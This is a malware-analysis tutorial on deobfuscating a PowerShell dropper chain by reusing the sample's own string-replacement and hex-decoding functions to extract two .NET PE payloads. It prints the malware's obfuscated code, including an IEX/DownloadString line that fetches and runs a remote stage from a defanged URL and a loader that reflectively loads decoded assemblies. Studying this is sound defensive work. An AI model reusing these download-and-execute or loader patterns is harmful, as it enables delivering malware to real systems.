Smarter, Not Harder: Getting Malware to Help You Analyze It
When analyzing even non-advanced malware nowadays, it’s common to find heavy obfuscation within samples. PowerShell and .NET malware for Windows can be obfuscated easily using various packers, crypters, or script obfuscation tools. If you know how to manipulate the malware’s code, however, you can use its own deobfuscation capabilities to reveal the unpacked samples.
Newton’s Third Law (of Malware)
If you’ve studied physics, you’ve likely run across Newton’s Third Law of Motion: “For every action, there is an equal and opposite reaction.” The same law can be applied to obfuscated malware. Adversaries may encrypt or encode malicious code while it is at rest or in transit to avoid static signatures. During execution, though, the encoding or encryption must be removed so the code can successfully load and execute.
To facilitate this process, adversaries commonly include algorithms within obfuscated code designed to remove the obfuscation at runtime. If you can focus on how the algorithm is called and used, you can use it for your own purposes!
Safety First!
This exercise in deobfuscation requires us to execute portions of code from malware. We’re not performing dynamic analysis, but there is the possibility that we might accidentally execute some malicious code. To protect against this possibility, use a virtual machine for analysis. Remove any network connections and shared folders from the VM, then take a snapshot before beginning to work.
During analysis we want to identify any code designed to interpret, invoke, or execute commands so we can comment it out. We only want to execute commands designed to manipulate data and write data to files.
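As a rough aid for that review, here is a minimal Python sketch that flags lines containing common execution-related PowerShell tokens. The pattern list and the function name `find_execution_lines` are assumptions made for this illustration and are far from exhaustive. Python is used only as a scratchpad outside the malware's own language.

```python
import re

# Illustrative, non-exhaustive patterns for PowerShell tokens that run code.
# This list is an assumption for the sketch, not a complete inventory.
EXECUTION_PATTERNS = [
    r"\biex\b",
    r"\binvoke-expression\b",
    r"\binvoke-command\b",
    r"\bstart-process\b",
    r"\.invoke\(",
    r"\bset-alias\b",
    r"\bsal\b",
]


def find_execution_lines(script_text):
    """Return (line_number, line) pairs that appear to execute code."""
    hits = []
    for number, line in enumerate(script_text.splitlines(), start=1):
        # Drop backticks so tokens such as I`EX match the plain patterns.
        normalized = line.replace("`", "").lower()
        if any(re.search(pattern, normalized) for pattern in EXECUTION_PATTERNS):
            hits.append((number, line))
    return hits


# Invented three-line input, used only to exercise the function.
sample = "$x = 'data'\nI`EX($x)\nSet-Content -Path out.txt -Value $x"
for number, line in find_execution_lines(sample):
    print(number, line)
```

A scan like this only catches literal tokens. Command or method names that are assembled from strings at runtime will not match, so it supplements a manual read of the script rather than replacing it.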
A Simple Example to Start
An excellent example of using the malware code against itself can be found with this sample: https://www.virustotal.com/gui/file/578f5dba1af809ee5b492582c38c5cf6e8bd1319fe91cc2cb0fb6066ca3c1eb9/. This sample leads to the execution of a second, more complex sample that we can also work with.
The original code for this sample appears similar to this:
$1 = 'Net'+'.@@@@@@@@@@@@@$$$$$$$$$$$$$$$$$>>>>>>>>>>>>>t'.Replace('@@@@@@@@@@@@@$$$$$$$$$$$$$$$$$>>>>>>>>>>>>>',''+'Webc'+'lien')
$2 = '>>>>>>>>>>>>>>>>>>~~~~~~~~~~~~~~~~~~okE'.Replace('>>>>>>>>>>>>>>>>>>~~~~~~~~~~~~~~~~~~','InV')
$3 = 'D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g'
I`EX((n`e`W`-Obj`E`c`T (($1))).(($3)).$2((('hxxps://raw.githubusercontent[.]com/az3r12/NYAN/main/Server.jpg')))).Replace('ooooiiiiiiiiiijhgfghjiugghjllknfderrthbbvccdssgvhhgoooooo','ForEach-Object {( [Convert]::ToInt16(([String]$_), 8) -As[Char])});sal g $t0').Replace('rxectfyvhgbuyhnikjmmnubyvbgvfcttyghuytvcxetcryvtubyjnhbgvfcdrctvuybvcrxrtyuubvtrcex','[Parameter(Mandatory=$true)] [String]$HLH').Replace('trdyjtuybiuyminubyvtcrytvybunibuyvtcrxtcytvuybiubihugyftuyiuo','New-Object -TypeName byte[] -ArgumentList ($HLH.Length / 2)').Replace('fyyfbyfyfjyfjvyhtftdvbytdvtftfbfbytf','[Convert]::ToByte($HLH.Substring($i, 2), 16)').Replace('trcymtuvybiuyvtcrtcytuyiubyvtcw4gh5djf6g7nbfvdrcsxetcrdytfbygyvcdr','{').Replace('yuuuuuuuuuuuuuuuuvgggggggggggxddddddddddzswvttttttttt','(').Replace('mbappebgfvnjjhffgjjufghiolmgfd mbappe',')')
In this example, the first three variables hold the strings Net.Webclient, InVokE, and Downloadstring, obfuscated using string replacement and a string broken up into individual characters. Put together, they indicate PowerShell will call Net.Webclient.DownloadString to download something from a URL. Later in the code there is a URL, so we can reasonably assume the code will download something from it. At the beginning of the final line, an IEX statement is slightly obfuscated using a single backtick character. IEX is shorthand for Invoke-Expression in PowerShell, and we can assume it will execute any code downloaded from the URL.
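To check that reading of the three variables without running any PowerShell, the same string operations can be reproduced in a minimal Python sketch. The names `junk_1`, `junk_2`, `var_1` through `var_3`, and `strip_backticks` are made up for this illustration. The junk markers are written once and reused to build the input, so the sketch mirrors the sample's logic rather than parsing it.

```python
# Junk marker strings in the style of the sample, defined once and reused.
junk_1 = "@@@@@@@@@@@@@$$$$$$$$$$$$$$$$$>>>>>>>>>>>>>"
junk_2 = ">>>>>>>>>>>>>>>>>>~~~~~~~~~~~~~~~~~~"

# $1: 'Net' + '.<junk>t'.Replace(<junk>, 'Webc' + 'lien')
var_1 = "Net" + ("." + junk_1 + "t").replace(junk_1, "Webc" + "lien")

# $2: '<junk>okE'.Replace(<junk>, 'InV')
var_2 = (junk_2 + "okE").replace(junk_2, "InV")

# $3: short pieces joined together; the sample's many empty strings add nothing.
var_3 = "".join(["D", "o", "w", "n", "l", "o", "a", "d", "s", "tri", "", "", "n", "g"])


def strip_backticks(token):
    """Remove backticks from a token purely to make it readable."""
    return token.replace("`", "")


print(var_1, var_2, var_3)
print(strip_backticks("I`EX"), strip_backticks("n`e`W`-Obj`E`c`T"))
```

Stripping every backtick is a simplification of PowerShell's escape rules and is meant only as a reading aid for command names like these.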
After the IEX there are loads of .Replace() function calls. This is where the adversary manipulates data in their next stage of the chain. Presumably whatever gets executed will have junk code inside, but the junk code is replaced by real, useful code before execution. Once we retrieve the next stage into a text file, we can deobfuscate it using this code:
$obfuscated_script = Get-Content ./Server.jpg
$deobfuscated_script = $obfuscated_script.Replace('ooooiiiiiiiiiijhgfghjiugghjllknfderrthbbvccdssgvhhgoooooo','ForEach-Object {( [Convert]::ToInt16(([String]$_), 8) -As[Char])});sal g $t0').Replace('rxectfyvhgbuyhnikjmmnubyvbgvfcttyghuytvcxetcryvtubyjnhbgvfcdrctvuybvcrxrtyuubvtrcex','[Parameter(Mandatory=$true)] [String]$HLH').Replace('trdyjtuybiuyminubyvtcrytvybunibuyvtcrxtcytvuybiubihugyftuyiuo','New-Object -TypeName byte[] -ArgumentList ($HLH.Length / 2)').Replace('fyyfbyfyfjyfjvyhtftdvbytdvtftfbfbytf','[Convert]::ToByte($HLH.Substring($i, 2), 16)').Replace('trcymtuvybiuyvtcrtcytuyiubyvtcw4gh5djf6g7nbfvdrcsxetcrdytfbygyvcdr','{').Replace('yuuuuuuuuuuuuuuuuvgggggggggggxddddddddddzswvttttttttt','(').Replace('mbappebgfvnjjhffgjjufghiolmgfd mbappe',')')
Set-Content -Path ./deobfuscated_Server.jpg.ps1 -Value $deobfuscated_script
In this particular case we reused the .Replace() function calls to make all the deobfuscation happen automatically rather than doing a manual find and replace operation for each one. This sort of efficiency can add up to a lot of saved time during analysis.
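The same idea carries over to other tooling. As a minimal sketch, assuming the junk-to-code pairs have been copied out of the dropper into a list, the chain can be expressed as a loop in Python. The function name `apply_replacements` and the one-line input are invented for this illustration; only the two junk markers follow the sample.

```python
def apply_replacements(text, pairs):
    """Apply each (junk, real) replacement in order, like chained .Replace() calls."""
    for junk, real in pairs:
        text = text.replace(junk, real)
    return text


# Two junk markers in the style of the sample's final .Replace() calls.
OPEN_JUNK = "yuuuuuuuuuuuuuuuuvgggggggggggxddddddddddzswvttttttttt"
CLOSE_JUNK = "mbappebgfvnjjhffgjjufghiolmgfd mbappe"
pairs = [(OPEN_JUNK, "("), (CLOSE_JUNK, ")")]

# Invented one-line input that uses the markers in place of parentheses.
obfuscated = "Write-Output " + OPEN_JUNK + "1 + 2" + CLOSE_JUNK
print(apply_replacements(obfuscated, pairs))
```

Keeping the pairs in a list preserves the order in which the malware applies them, which matters if one replacement produces text that a later one would match.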
Getting More Complex
The next stage in the chain looks something like this (except with much more hex content):
$b1 = "111"
$b2 = "105"
$b3 = "130"
$b4 = "[String]" ; $t0=-Join (($b1, $b2, $b3 )| ForEach-Object {( [Convert]::ToInt16(([String]$_), 8) -As[Char])});sal g $t0
$b4=$TC = "4D5A9\/\/\/\/3...".replace('\/','0' )
Function HBankers {
[CmdletBinding( )]
[OutputType([byte[]] )]
param(
[Parameter(Mandatory=$true)] [String]$HLH
)
$HHPPLL = New-Object -TypeName byte[] -ArgumentList ($HLH.Length / 2)
for ($i = 0; $i -lt $HLH.Length; $i += 2 ) {
$HHPPLL[$i / 2] = [Convert]::ToByte($HLH.Substring($i, 2), 16)
}
return [byte[]]$HHPPLL
}
[String]$HL = '4D5A9\/\/\/\/3...'.replace('\/','0' )
$A1 = "Ge>>>>>>>>>>>>>>>..............>>>>>>>>>>od".Replace('>>>>>>>>>>>>>>>..............>>>>>>>>>>','tMeth' )
$A2 = "g!!!!!!!!!!!!!@@@@@@@@@@@@@@@@################in".Replace('!!!!!!!!!!!!!@@@@@@@@@@@@@@@@################','et_CurrentDoma' )
$A3 = "I@@@@@@@@@@@@@@@>>>>>>>>>>>>>>..!!!!!!!!!!!!!!!!!!!!!!e".Replace('@@@@@@@@@@@@@@@>>>>>>>>>>>>>>..!!!!!!!!!!!!!!!!!!!!!!','nvok' )
$A4 = "Lo!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!".Replace('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!','ad' )
$a7 = "$null"
$a5 = '[S!!!!!!!!!!!!!!@@@@@@@@@@@@@@!!!!!!!!!!!!!!!!^^^^^^^^^^^^^in]'.Replace('!!!!!!!!!!!!!!@@@@@@@@@@@@@@!!!!!!!!!!!!!!!!^^^^^^^^^^^^^','ystem.AppDoma' ) | g ; $a5.$A1($A2 ).$A3($a7,$null ).$A4([Byte[]](HBankers ($HL ) ) )| g
$a8 = 'MS>>>>>>>>>>>>>.........e'.Replace('>>>>>>>>>>>>>.........','Build.ex' )
[Byte[]]$HH= HBankers $TC
[rerup]::qw5f0($a8,$HH )
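One detail in the first few lines of this stage is worth decoding before reusing any of it. The values in $b1 through $b3 are passed to [Convert]::ToInt16 with base 8 and cast to characters, so they appear to be octal character codes. A minimal Python sketch of the same conversion (the variable names here are made up for illustration):

```python
# The three strings assigned to $b1, $b2, and $b3 in the sample.
octal_values = ["111", "105", "130"]

# Parse each string as base 8 and turn the number into a character,
# mirroring [Convert]::ToInt16($_, 8) -As [Char] followed by -Join.
decoded = "".join(chr(int(value, 8)) for value in octal_values)

print(decoded)  # IEX
```

If that reading is right, `sal g $t0` (sal is the built-in alias for Set-Alias) makes `g` another name for IEX, and each `| g` in the script would hand data to Invoke-Expression. Those are exactly the kinds of statements to leave out when borrowing code from the sample.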
There’s a lot of fun obfuscation in this step of the chain, but I want to focus on two particular components: the hex strings starting with 4D5A. The bytes 4D 5A are the traditional magic bytes at the start of a Windows PE file and are represented as MZ in ASCII. The script is shortened in this post for brevity, but examining it in VirusTotal will show the sample contains almost 200KB of encoded text. In addition, we can see there are two Byte[] array structures used by the code. We can hypothesize that the two hex strings decode into Windows PE files that will eventually be held inside those byte arrays. Now, how can we make that happen?
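The MZ claim is easy to confirm on the visible prefix of the strings. The following Python sketch undoes the `\/` placeholder the way the sample's .replace() call does and decodes the first two bytes. The helper names `restore_hex` and `starts_with_mz` are assumptions for this example, and only the prefix shown in the post is used, not the full payload.

```python
def restore_hex(obfuscated_hex, placeholder=r"\/", real="0"):
    """Undo the placeholder substitution, as the sample's .replace('\\/','0') does."""
    return obfuscated_hex.replace(placeholder, real)


def starts_with_mz(hex_text):
    """Decode the first two bytes of a hex string and compare them to 'MZ'."""
    return bytes.fromhex(hex_text[:4]) == b"MZ"


# Only the prefix shown in the post; the rest of the string is elided there.
prefix = restore_hex(r"4D5A9\/\/\/\/3")
print(prefix)
print(starts_with_mz(prefix))
```

The restored prefix reads 4D5A900003, which is consistent with the opening bytes commonly seen in Windows executables.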
In both the Byte[] array statements, the adversary references the function HBankers(). In addition, the declaration for this function shows it takes string input and outputs a byte array. We can reasonably assume this function performs deobfuscation, so let’s use it to our advantage! We can use portions of the malware in our own script here:
[String]$TC = "4D5A9\/\/\/\/3...".replace('\/','0' )
[String]$HL = '4D5A9\/\/\/\/3...'.replace('\/','0' )
Function HBankers {
[CmdletBinding( )]
[OutputType([byte[]] )]
param(
[Parameter(Mandatory=$true)] [String]$HLH
)
$HHPPLL = New-Object -TypeName byte[] -ArgumentList ($HLH.Length / 2)
for ($i = 0; $i -lt $HLH.Length; $i += 2 ) {
$HHPPLL[$i / 2] = [Convert]::ToByte($HLH.Substring($i, 2), 16)
}
return [byte[]]$HHPPLL
}
[Byte[]]$deobfuscated_bin_1 = HBankers $TC
[Byte[]]$deobfuscated_bin_2 = HBankers $HL
Set-Content -Path deobfuscated_1.bin -Value $deobfuscated_bin_1 -AsByteStream
Set-Content -Path deobfuscated_2.bin -Value $deobfuscated_bin_2 -AsByteStream
Now we can execute the script and then take a look at the files that get created:
PS /home/ForensicITGuy/NYAN> file *.bin
deobfuscated_1.bin: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
deobfuscated_2.bin: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
And just like that, we have the PE binary payloads for additional analysis! The HBankers() function contained everything we needed to output a byte array into a variable, and Set-Content provided the means for us to write that byte array to disk. Now that we have the files, we can continue analysis in the near future.
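For anyone who wants to double-check the output outside PowerShell, the conversion and a basic header check can be sketched in Python. This is an illustration under stated assumptions, not part of the original workflow. `hex_to_bytes` mimics the loop in HBankers, `looks_like_pe` is a hypothetical helper that follows the DOS header's offset field at 0x3C to the PE signature, and `fake_hex` is a synthetic stand-in rather than the sample's payload.

```python
import struct


def hex_to_bytes(hex_text):
    """Convert a hex string to bytes two characters at a time, like HBankers."""
    out = bytearray(len(hex_text) // 2)
    for i in range(0, len(hex_text) - 1, 2):
        out[i // 2] = int(hex_text[i:i + 2], 16)
    return bytes(out)


def looks_like_pe(data):
    """Check for the MZ magic and a PE signature at the offset stored at 0x3C."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"


# Synthetic stand-in built for this example: MZ, zero padding up to 0x3C,
# a little-endian offset of 0x40, then the PE signature at 0x40.
fake_hex = "4D5A" + "00" * 58 + "40000000" + "50450000"

data = hex_to_bytes(fake_hex)
print(len(data), looks_like_pe(data))
```

A check like this only confirms the header structure. Tools such as `file` remain the quicker way to identify what kind of binary was written to disk.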